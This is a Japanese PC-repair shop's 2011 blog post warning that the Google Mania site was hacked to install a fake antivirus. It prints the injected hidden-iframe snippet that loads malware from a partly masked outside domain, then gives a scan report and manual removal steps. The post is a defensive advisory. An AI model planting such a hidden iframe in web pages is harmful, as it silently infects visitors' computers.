営業日のご案内

携帯サイト

エコ活動


GSL

オーシャンパソコンレスキューは植林活動を通しCO2の削減に取り組んでいます。

一般サイトも改竄されると攻撃サイトになってしまいます

特定サイトの非難になってしまう可能性があるので記事にしようか悩んだのですが、連絡が取れないことと、過去に他の方にも指摘がされているのにも関わらず、対策がとられていないようなので、被害者がこれ以上増えないようにしたいという事もあり今回の記事を紹介させていただきます。

事の始まりはgoogleさんで調べ物をしてたどり着いたGoogle Maniaというサイト。
このサイトではgoogleの各種サービスについて詳しい解説などがされていて、この関係としては結構人気があると思われます。
検索でも最上位に表示されるような状況なので知っている方も多いかもしれません。

改竄されてしまったサイト(Google Mania)

改竄されてしまったサイト(Google Mania)

ところがこのサイト長らくメンテナンス等されておらず放置状態となっています。
サイト自体も古いバージョンのCMSが利用されており既知の重大な脆弱性を持っているのですがメンテナンスされていない事もあって、悪意のある第3者によってサイトの改ざんが行われてしまっています。(ざっと確認しましたが全ページ改ざんされているようです)

6月頃に一度改ざんされて攻撃サイトと化してしまっていたようです(ソース)が、改ざんで埋め込まれたサイトが停止された事でいったんは落ち着いたようです。
(サイトメンテナンスによって改ざんされたわけではないようで、脆弱性はそのまま?)

今回2011年8月22日(今日)にアクセスしたわけですが、新しく改ざんされたかもしくは停止されたサイトが復帰したかの理由によりまたしても攻撃サイトと化しています。
しかも現時点(8月22日 17:00)でほとんどのセキュリティーソフトが検知できない新種の偽セキュリティソフトが勝手にPCにインストールされ実行されてしまうという状況なのです。

(改ざんされたサイト)
 Google Mania(google-mania.net)

(不正コード)
 <div style=”position: absolute; left: -1999px; top: -2999px;”><iframe src=”*ttp://kliemwrznr.co.**/i.php?go=1″ width=”3″ height=”3″></iframe></div>

(ウィルス検査結果)

=======================================
VirSCAN.org Scanned Report :
Scanned time   : 2011/08/22 17:14:43 (JST)
Scanner results: 5% のアンチウイルスが(2/37) マルウェアと判定しました
File Name      : 0.2367670180808894.exe
File Size      : 936448 byte
File Type      : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5            : 22f95e63e1e109d894149c6b9949d59f
SHA1           : 5e1c325627988ebe86ea3dae280764334442104b
Online report  : http://r.virscan.org/173025f2d056d40ef7d8ff2442d76494

Scanner        Engine Ver      Sig Ver            Scan result
a-squared      5.1.0.3         20110822060411     -
AhnLab V3      2011.08.22.02   2011.08.22         -
AntiVir        8.2.6.32        7.11.13.155        -
Antiy          2.0.18          20110804.11725727  -
Arcavir        2011            201107140423       -
Authentium     5.1.1           201108211932       -
AVAST!         4.7.4           110821-1           Win32:FakeAlert-AZL [Trj]
AVG            8.5.850         271.1.1/3849       -
BitDefender    7.90123.8954708 7.38720            -
ClamAV         0.97.1          13462              -
Comodo         5.1             9829               -
CP Secure      1.3.0.5         2011.08.19         -
Dr.Web         5.0.2.3300      2011.08.22         -
F-Prot         4.6.2.117       20110822           -
F-Secure       7.02.73807      2011.08.22.01      -
Fortinet       4.2.257         13.567             -
GData          22.1742         20110822           -
ViRobot        20110820        2011.08.20         -
Ikarus         T3.1.32.20.0    2011.08.22.79150   -
JiangMin       13.0.900        2011.08.21         -
Kaspersky      5.5.10          2011.08.22         -
KingSoft       2009.2.5.15     2011.8.22.14       -
McAfee         5400.1158       6445               -
Microsoft      1.7604          2011.08.22         -
NOD32          3.0.21          6398               -
Norman         6.07.10         6.07.00            -
Panda          9.05.01         2011.08.21         -
Trend Micro    9.200-1012      8.360.11           -
Quick Heal     11.00           2011.08.20         -
Rising         20.0            23.71.03.03        -
Sophos         3.22.0          4.68               Mal/FakeAV-LX
Sunbelt        3.9.2497.2      10238              -
Symantec       1.3.0.24        20110821.003       -
nProtect       20110821.01     12475755           -
The Hacker     6.7.0.1         v00282             -
VBA32          3.12.16.4       20110821.1017      -
VirusBuster    5.3.0.4         14.0.179.0/5952350 -
=======================================

検出できたものは「Win32:FakeAlert-AZL [Trj]」、「Mal/FakeAV-LX」として発見していますね。

偽セキュリティソフト(Security Protection)ですので自分を棚に上げて存在しないウィルスを大量に発見したかのように振る舞い
駆除するためにお金を払え(ソフトを購入しろ)という動作を行います。
攻撃手法の詳細は分かりませんが危険な状態ですね。

偽セキュリティソフト(Security Protection)

偽セキュリティソフト(Security Protection)

一度感染すると自分以外の常駐プログラムをどんどん強制終了させ、本物のセキュリティソフトも停止させられます。
また、偽セキュリティソフトを終了させようとタスクマネージャー等を立ち上げても強制終了させられてしまいます。
ということで一度動作し出すとシャットダウンするしかなくなります。
(偽セキュリティソフトが動いていますが意味がないですし、他の不正プログラムをネットから引っ張ってくる可能性もあります)

駆除は以下の方法で可能です。(幸い今回のケースは簡単でした)

  1. 感染を確認したら即時ネットワーク接続を切断しパソコンをシャットダウンします。
    有線接続の場合はケーブルを抜き、無線接続の場合は電波をOFFにするかアクセスポイントの接続を切断します。
  2. 再度電源を入れます。画面に何か表示されたらしばらくF8キーをトントン押し続けて下さい。
    詳細オプションの選択メニュー(またはWindows拡張オプションメニュー)が表示されます。
  3. 「セーフモード」を選択してWindowsを起動します。
  4. 偽セキュリティソフトの起動を停止
    スタート→すべてのプログラム→スタートアップ→に「Security Protection」という項目があるので
    マウスカーソルがこの上において 右クリック→削除
  5. デスクトップのショートカットなどを削除
    デスクトップ上に「Security Protection」というショートカットがあるので削除。
    また、でたらめなファイル名アイコンがある場合はこれも削除(これが偽セキュリティソフトのインストーラーです)。

    偽セキュリティソフトのアイコン

    偽セキュリティソフトのアイコン

  6. 偽セキュリティソフト本体を削除

    WindowsVista、7の場合
      C:\Users\(ログイン名)\AppData\Roaming\defender.exe

    WindowsXP,2000の場合
      C:\Documents and Settings\All Users\Application Data\defender.exe

    が偽セキュリティソフト本体なのでこれを削除

  7. 元の状態に戻す
    パソコンを再起動します。
    起動が終わったらネット接続を元に戻します(線を繋ぎ直す、または無線を再接続)。

以上です。
対象の箇所にファイルがない場合はファイル名でパソコン内を検索等してみて下さい。
(数日経てばほとんどのセキュリティソフトで対応できると思いますが。。。)

サイト管理者は自分のサイトに責任を持って管理していただきたいものですね。

昔のようにいわゆる危ないサイトにいかなければウィルスに感染しないという時代はとっくに終わっています。今回のようにウィルス対策ソフトのワクチンが間に合わない場合もありますが、それでも最低限の防御をしてより安全にインターネット等を楽しんでいただければと思います。

自信がない&原因が違うなどの場合は是非弊社にお預けください!
他社には断られたような事案も大歓迎。お困りのことがあったら、お気軽にご連絡ください。お見積もりは無料です。

Tel:0268-75-8270
または
お問い合わせ
よりご連絡ください。